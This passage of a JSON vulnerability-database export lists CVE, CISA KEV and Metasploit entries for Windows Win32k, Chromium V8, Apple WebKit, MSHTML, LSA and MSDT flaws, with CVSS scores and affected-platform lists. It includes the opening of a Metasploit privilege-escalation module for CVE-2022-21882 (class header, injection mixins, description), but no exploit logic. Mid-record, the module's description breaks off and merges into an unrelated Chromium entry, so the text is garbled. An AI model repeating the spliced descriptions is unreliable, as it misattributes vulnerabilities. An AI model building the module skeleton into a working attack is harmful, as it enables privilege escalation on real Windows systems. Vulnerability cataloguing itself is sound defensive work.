This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to function on a wider range of Windows 10 targets.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-18T20:23:38", "type": "metasploit", "title": "Win32k ConsoleControl Offset Confusion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2021-1732", "CVE-2022-21882"], "modified": "2023-05-25T04:36:46", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_21882_WIN32K-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2022_21882_win32k/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = AverageRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include 
Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::Deprecated\n moved_from 'exploit/windows/local/cve_2021_1732_win32k'\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'Win32k ConsoleControl Offset Confusion',\n 'Description' => %q{\n A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being\n treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to\n achieve an out of bounds write operation, eventually leading to privilege escalation.\n\n This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.\n In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is\n is the same for both vulnerabilities. 
This vulnerability affects web browsers that utilize Chromium, including Google Chrome and Microsoft Edge.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Type Confusion Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-30551", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Win32k contains an unspecified vulnerability which allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2022-02-04T00:00:00", "type": "cisa_kev", "title": "Microsoft Win32k Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882"], "modified": "2022-02-04T00:00:00", "id": "CISA-KEV-CVE-2022-21882", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Apple Webkit, which impacts iOS, iPadOS, and macOS, contains a vulnerability which allows for remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-11T00:00:00", "type": "cisa_kev", "title": "Apple Webkit Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-11T00:00:00", "id": "CISA-KEV-CVE-2022-22620", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft MSHTML contains a unspecified vulnerability which allows for remote code execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft MSHTML Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-40444", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Windows Local Security Authority (LSA) contains a spoofing vulnerability allowing an unauthenticated attacker to call a method on the 
LSARPC interface and coerce the domain controller to authenticate against another server using NTLM.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Local Security Authority (LSA) Spoofing Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36942"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-36942", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-08-11T23:25:24", "description": "A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. 
An attacker who successfully exploits this vulnerability can run code with the privileges of the calling application.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-14T00:00:00", "id": "CISA-KEV-CVE-2022-30190", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-05-23T15:41:36", "description": "In kbase_jd_user_buf_pin_pages of mali_kbase_mem.c, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. 
User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-210470189References: N/A", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-16T15:15:00", "type": "cve", "title": "CVE-2021-39793", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39793"], "modified": "2022-03-23T19:25:00", "cpe": ["cpe:/o:google:android:-"], "id": "CVE-2021-39793", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-39793", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:google:android:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:41:39", "description": "A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 15.2 and iPadOS 15.2. 
An application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-08-24T19:15:00", "type": "cve", "title": "CVE-2021-30983", "cwe": ["CWE-120"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30983"], "modified": "2021-12-28T20:40:00", "cpe": [], "id": "CVE-2021-30983", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30983", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-05-27T14:19:37", "description": "Use after free in V8 in Google Chrome prior to 89.0.4389.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, 
"impactScore": 5.9}, "published": "2021-04-09T22:15:00", "type": "cve", "title": "CVE-2021-21195", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21195"], "modified": "2021-06-01T20:25:00", "cpe": ["cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:34", "cpe:/o:fedoraproject:fedora:32"], "id": "CVE-2021-21195", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21195", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:29:53", "description": "Windows LSA Spoofing Vulnerability.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-10T21:15:00", "type": "cve", "title": "CVE-2022-26925", "cwe": ["CWE-290"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26925"], "modified": "2022-10-07T18:08:00", "cpe": ["cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server_2008:sp2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2022-26925", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26925", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", 
"cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*"]}, {"lastseen": "2023-05-27T14:40:31", "description": "Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-15T22:15:00", "type": "cve", "title": "CVE-2021-30551", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": 
{"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2022-09-28T20:02:00", "cpe": ["cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-30551", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30551", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:23:51", "description": "A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, macOS Big Sur 11.6.3, macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. 
Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22587", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587"], "modified": "2022-03-28T16:49:00", "cpe": [], "id": "CVE-2022-22587", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22587", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-14T14:24:15", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. 
Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22620", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-09-09T20:41:00", "cpe": [], "id": "CVE-2022-22620", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-03T14:36:25", "description": "objects.cc in Google V8 before 5.2.361.27, as used in Google Chrome before 52.0.2743.82, does not prevent API interceptors from modifying a store target without setting a property, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, 
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5128", "cwe": ["CWE-254"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5128"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106", "cpe:/a:google:v8:5.2.360"], "id": "CVE-2016-5128", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5128", "cvss": {"score": 6.8, "vector": 